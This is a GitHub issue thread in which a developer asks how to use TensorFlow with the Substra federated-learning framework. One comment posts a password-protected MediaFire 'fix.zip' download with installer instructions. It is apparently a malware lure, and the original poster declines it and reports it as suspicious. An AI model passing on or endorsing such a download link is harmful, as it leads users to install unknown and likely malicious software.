### ISSUE TITLE
Tensorflow with Substra documentation

### ISSUE THREAD

**Issue by KindEmily** [SushiOfDestiny/UE22-projet-substrafl#11]
Greetings 🥰

My name is Emily , I`m trying to implement similar solution  💪

I've noticed your project and I'm also trying to implement the Tensorflow (In my case I`m training object detection classification based on model from TF zoo) 

### How ? 🤔 
I`m wondering how you were able to find/implement compatible components instead of PyTorch, which is currently the only library used in Substra tutorials 

I would appreciate any information 

So far I`ve reached out to the Substra dev team (on Slack) and they suggested: 

> you’re going to need to write some additional code that is already taking care of in `substrafl` for `pytorch`
you should look at how it’s done with sklearn in this [exemple](https://docs.substra.org/en/stable/examples/substrafl/go_further/run_iris_sklearn.html), understand what is reimplemented and why, and you can also look in this [module](https://github.com/Substra/substrafl/tree/main/substrafl/algorithms/pytorch) of the code base how things are done for `pytorch`, and basically write your own custom `Algo` class to use

Thank you upfront 🥰 

P.s. I'm tagging @SushiOfDestiny @ThibaultFy @Samy57 @bendgc @julesdesir because I hope that I will get a reply sooner (the last commit was 2 weeks ago and I`m not really sure if you`re actually will continue to work on this )

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by KindEmily** [comment]
With all respect I`m not considering downloading this file, since I`m dont know that`s inside 

Is there is anything else you can provide? I would be happy to explore the files if you will download them into public repository 
@TrymenT-AlphA

**Comment by KindEmily** [comment]
Updated: the user @TrymenT-AlphA tried to force me to download something, and now deleted the account. My question is still relevant
